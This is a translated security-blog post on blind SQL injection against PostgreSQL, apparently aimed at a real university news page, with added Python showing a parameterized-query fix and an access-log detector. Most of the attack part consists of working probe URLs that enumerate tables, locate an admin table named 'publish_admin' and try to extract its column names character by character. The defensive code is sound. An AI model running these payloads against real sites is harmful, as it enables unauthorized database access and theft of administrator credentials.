PostgreSQL Blind Injection Notes, Part 2

Category: Security articles

OK, let's continue.
So we have 20 tables.
Next, let's find out what those tables are.


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(relname) from pg_stat_user_tables limit 1 OFFSET 0) between 0 and 128

This query checks how long the first table's name is.



http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(relname) from pg_stat_user_tables limit 1 OFFSET 0) between 0 and 64
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(relname) from pg_stat_user_tables limit 1 OFFSET 0) between 19 and 19

These two queries show that the first table's name has length 19.

Next, let's find out what the first table's name is.



http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 0) between 0 and 32768
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 0) between 112 and 120

Continuing the same way, character by character, we can guess the whole table name: just change the first 1 in (select ascii(substr(relname,1,1)) to 2,
which gives the second character of the first table's name, i.e. (select ascii(substr(relname,2,1)).
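The true/false behaviour these range probes depend on exists only because the id value is spliced into the SQL text. The Python below is an added example, not code from the original post; it uses an in-memory SQLite table as a stand-in for the site's PostgreSQL database (the news table, its columns and rows are made up) and contrasts the vulnerable string-splicing lookup with one that validates id as a plain integer and binds it as a parameter, so a boolean tail appended to the value is rejected before any SQL is built.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the site's database (schema and rows are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(13072, "Article 13072"), (13073, "Article 13073")],
    )
    return conn


def lookup_unsafe(conn, raw_id):
    """The shape the write-up exploits: raw request text becomes part of the SQL,
    so 'id=13072 and <condition>' is evaluated as SQL and the page differs by truth value."""
    row = conn.execute(f"SELECT title FROM news WHERE id={raw_id}").fetchone()
    return row[0] if row else None


ID_RE = re.compile(r"\d{1,10}")


def parse_id(raw_id):
    """Accept only a plain decimal integer; anything else is rejected before SQL exists."""
    return int(raw_id) if ID_RE.fullmatch(raw_id.strip()) else None


def lookup_safe(conn, raw_id):
    """Validate, then bind the value as a parameter so the driver never parses it as SQL."""
    article_id = parse_id(raw_id)
    if article_id is None:
        return None
    row = conn.execute("SELECT title FROM news WHERE id=?", (article_id,)).fetchone()
    return row[0] if row else None


def demo():
    """Same three inputs through both lookups: (unsafe result, safe result) per input."""
    conn = make_db()
    probes = ["13072", "13072 and 1=1", "13072 and 1=0"]
    return {p: (lookup_unsafe(conn, p), lookup_safe(conn, p)) for p in probes}


if __name__ == "__main__":
    for probe, (unsafe, safe) in demo().items():
        print(f"{probe!r:24} unsafe={unsafe!r:18} safe={safe!r}")
```

With the spliced query, "13072 and 1=1" returns the article and "13072 and 1=0" returns nothing, which is exactly the signal the write-up reads off the page. With the hardened lookup both are rejected and only "13072" resolves. The binding step is the same with a PostgreSQL driver; psycopg2, for instance, takes `cur.execute("... WHERE id = %s", (article_id,))`.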

OK, now let's look at the second table's name.
Normal response:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 1) between 112 and 120

What is the difference between this and the query for the first character of the first table's name?

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 0) between 112 and 120

Right: we only need to change OFFSET 0 to OFFSET 1.

As a result we get the admin table we were after: publish_admin

Next, let's look at the columns. First, construct the query:
/* get the oid of the table named xxx */


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(oid,1,1)) from pg_class where relname='publish_admin' limit 1 OFFSET 0) between 0 and 32768

An error is returned. The oid column is probably of type oid; to make the data types compatible we use the cast function to force-convert it to varchar.


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(cast(oid+as+varchar(10)),1,1)) from pg_class where relname='publish_admin' limit 1 OFFSET 0) between 0 and 3276811
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_name=$publish_admin$ limit 1 OFFSET 0) between 0 and 120

Still an error. I'm speechless.


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_name=0x7075626C6973685F61646D696E limit 1 OFFSET 0) between 0 and 120
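Every probe in this write-up leaves the same fingerprint in the web server's access log: a numeric id parameter followed by "and (select ...)", a "between N and M" range test, ascii(substr(...)) for single characters, catalog or information_schema reads, and limit/offset stepping through rows. The Python below is an added example, not code from the original post, showing how a defender can pull those signatures out of Apache/nginx combined-format log lines and flag a client that sends a run of them. The log lines are constructed for the example: the path and payloads follow the write-up's URLs, percent-encoded as a server would log them, while client addresses and timestamps are made up.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (not from the original post). Payloads mirror the
# write-up's probes; the IPs and timestamps are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0900] "GET /news/detail_e.html?id=13072 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:00:02 +0900] "GET /news/detail_e.html?id=13072%20and%20(select%20length(relname)%20from%20pg_stat_user_tables%20limit%201%20OFFSET%200)%20between%200%20and%20128 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:00:03 +0900] "GET /news/detail_e.html?id=13072%20and%20(select%20length(relname)%20from%20pg_stat_user_tables%20limit%201%20OFFSET%200)%20between%2019%20and%2019 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:00:04 +0900] "GET /news/detail_e.html?id=13072%20and%20(select%20ascii(substr(relname,1,1))%20from%20pg_stat_user_tables%20limit%201%20OFFSET%201)%20between%20112%20and%20120 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:00:05 +0900] "GET /news/detail_e.html?id=13072%20and%20(select%20ascii(substr(column_name,1,1))%20from%20information_schema.columns%20where%20table_name=$publish_admin$%20limit%201%20OFFSET%200)%20between%200%20and%20120 HTTP/1.1" 200 312
198.51.100.9 - - [10/Oct/2023:10:00:06 +0900] "GET /news/detail_e.html?id=13073 HTTP/1.1" 200 4800
"""

# Combined log format: client, identd, user, [time], "METHOD target HTTP/x", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signatures of boolean-based blind probing against PostgreSQL, matched on the
# percent-decoded parameter value (the text the database would actually see).
INDICATORS = {
    "and-subselect": re.compile(r"\band\s*\(\s*select\b", re.I),        # condition glued onto the id
    "between-range": re.compile(r"\bbetween\s+\d+\s+and\s+\d+\b", re.I),  # range test / binary search
    "ascii-substr": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),  # one character at a time
    "catalog-read": re.compile(
        r"\b(?:pg_stat_user_tables|pg_class|pg_tables|information_schema\.\w+)\b", re.I
    ),
    "limit-offset": re.compile(r"\blimit\s+\d+\s+offset\s+\d+\b", re.I),  # walking rows with OFFSET
}


def parse_line(line):
    """Split one combined-format line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # parse_qs percent-decodes and turns '+' into spaces, so %20 and + both become spaces
    rec["params"] = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def indicators_for(value):
    """Names of the probe signatures present in one decoded parameter value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def scan(log_text):
    """One finding per (request, parameter) that carries at least one signature."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                hits = indicators_for(value)
                if hits:
                    findings.append({"ip": rec["ip"], "ts": rec["ts"], "param": name,
                                     "status": rec["status"], "indicators": hits})
    return findings


def flag_clients(log_text, min_hits=3):
    """Clients with at least min_hits flagged requests. A single hit may be a scanner or a
    false positive; a run of range probes from one source is the extraction loop itself."""
    counts = Counter(f["ip"] for f in scan(log_text))
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["param"], ",".join(f["indicators"]))
    print("flagged:", flag_clients(SAMPLE_LOG))
```

The signatures are deliberately loose on whitespace and case because PostgreSQL is, and the write-up's own payloads mix "limit" with "OFFSET". Matching on the decoded value rather than the raw URL also keeps the regexes working when the attacker's client encodes spaces as "+" instead of "%20", as the cast(oid+as+varchar(10)) probe above does. The per-client threshold is what separates the method here from a one-off scanner hit: the extraction described in this post needs dozens of near-identical requests from the same source, differing only in the between bounds and the OFFSET.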



This article was first published on the WeChat public account 飓风网络安全 under the title "PostgreSQL盲注笔记二".
